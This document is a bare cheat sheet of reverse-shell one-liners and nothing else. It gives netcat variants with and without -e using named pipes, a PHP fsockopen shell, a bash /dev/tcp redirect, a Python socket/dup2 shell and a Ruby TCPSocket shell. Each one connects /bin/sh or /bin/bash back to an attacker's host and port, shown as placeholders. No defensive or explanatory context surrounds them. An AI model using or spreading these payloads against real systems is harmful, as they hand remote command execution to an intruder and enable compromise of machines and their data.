#Netcat without e v.1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IPAdress PortNumber >/tmp/f

#Netcat without e v.2
mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc IPAdress PortNumber 1>/tmp/backpipe

#Netcat
nc IPAdress Port -e /bin/sh 

#Php
$sock=fsockopen("IPAdress",PortNumber); exec("/bin/sh -i <&3 >&3 2>&3");

#Bash
bash -i >& /dev/tcp/IPAdress/PortNumber 0>&1

#Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IPAdress",PortNumber));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

#Ruby
ruby -rsocket -e'f=TCPSocket.open("IPAdress",PortNumber).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
